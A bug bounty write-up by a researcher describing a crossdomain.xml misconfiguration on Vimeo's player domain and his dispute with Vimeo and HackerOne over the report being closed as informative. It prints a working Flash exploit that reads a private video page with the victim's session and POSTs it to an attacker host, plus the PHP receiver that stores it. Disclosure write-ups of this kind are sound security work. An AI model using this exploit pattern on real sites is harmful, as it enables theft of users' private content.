Today, I’ll talk about one of my worst experiences in bug bounty programs with Vimeo’s security team.

First, if you don’t know Vimeo:
Vimeo (/ˈvɪmioʊ/[3]) is a video-sharing website in which users can upload, share and view videos.[4] It was the first video sharing site to support high-definition video (started in October 2007).[5] Vimeo was founded in November 2004 by Jake Lodwick and Zach Klein. [wiki]


They have started there BB program on HackerOne, 2 years ago.

I hadn’t been very active these days in the BB, but I saw they paid $600  for Private videos disclosure and CSRF on Vimeo leading toprivate videos go public , I accepted the challenge, and the target wasn’t about finding an XSS or a harmless CSRF, but it was about finding a way to leak the private videos. since they don’t pay well for XSS or other bugs, you will get duplicated, or mini bounty that you waste a lot of time on.

So I started by reading old reports that are related to this purpose. Almost every report was about crossdomain.xml file misconfiguration, I focused on this file around Vimeo’s sites.
In their rules there are a point about the corssdomain.xml that should be exploitable not just a novel:
* Reports of insecure crossdomain.xml configuration (again, unless you have a working proof of concept – and not just a report from a scanner) .

So, I stared looking for this file around the sites and try to find a way to exploit it. I found one here : 

https://player.vimeo.com/crossdomain.xml

vimeo
It is allowing any domain to send requests to this host, so the first step in the exploit is okay, but we can’t say it is a security issue since the player should works in other hosts.

I was digging to see what can be leaked like a CSRF-token, a username, an email …etc.
Following a group of tests, I found out that player.vimeo.com check the user’s cookie to know if he is logged in or not, then it’ll show him the private video if he were given the permission to watch it.
  I was using 2 browsers, Chrome for unauthenticated user, and Firefox for user user36551307.

I uploaded a video and set the privacy to only me. Here’s a link: https://player.vimeo.com/video/182118182

When I opened it using FF, I got the following:

vimeo


Different from Chrome:

vimeo

So the source code of the page depended on the user authentication, and it can be leaked in both ways. 

There, I needed to write a flash file to send a request to this URL, and leak the source code of the page, and see if I get the source can we play the video. I copied the source code of the html page and saved it on my PC something like test.html and it worked! 

I called leak.swf, then I needed to modify the flash file in readFrom:String 
and sendTo:String .

package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;

 public class XDomainXploit extends Sprite {
  public function XDomainXploit() {
   //URL of the  private video for the authenticated user  
   var readFrom:String = "https://player.vimeo.com/video/182118182";
   var readRequest:URLRequest = new URLRequest(readFrom);
   var getLoader:URLLoader = new URLLoader();
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try {
    getLoader.load(readRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }

  private function eventHandler(event:Event):void {
   //URL to the attacker origin 
   var sendTo:String = "http://xxe-me.esy.es/video.php"
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try {
    sendLoader.load(sendRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }
 }

I modified it to the video URL, and my host’s URL. The swf file will send the source code of the Vimeo player to video.php which will save the source of this page as a new html page.

The video.php source code :

<?php
$data = file_get_contents("php://input");
$page_content = file_put_contents('private_video.html', $data, FILE_APPEND | LOCK_EX);
if($page_content === false) {
 die('Didn't work ! ');
}
else { 
 echo "$page_content exploited !";
}
?>


When the file got the source code of the page from the leak.swf, php code will create an html page called private_video.html with the source code that it got before.

I made an exploit with full PoC here is the PoC video:


Everything worked just fine. I wrote a good report with PoC, codes, steps, and technical details. I got a bot response saying this is not an issue, please provide working PoC. I already did but I sent the video one more time.

2 days later, the team closed the report as “ Informative ”  and with this reply :

Thanks for your report. We are aware of this. This is how we allow custom flash players to work.

I was puzzled why they closed this, It is %100 a security issue, I replied again requesting to disclose this report publicly.

I waited for days and requested mediation from HackerOne Support. 30 days later, the H1 support told me that the Vimeo team pushed the public discourse 2 days and should have been published by then. I had to wait to see the reaction of H1 community. Two more days and nothing happened, I waited for 10 more days, because maybe and it wasn’t published yet, I contacted H1 support again. They replied with this:

vimeo

So Vimeo’s team has never replied me in the report, and they didn’t even fix it or contact me for months and they want a 60 days after, I requested the PD above all of this this report were closed as “ Informative”. And H1 team had nothing in hand to do, So I wrote this post to show that don’t live in the BB heaven.  By the way, this isn’t the first time for Vimeo’s team, here is another report without bounty or a respectful reply Report.

Tell me what you think about this in the comments, or contact me on my Twitter account @Abdulahhusam Thank you for reading it all.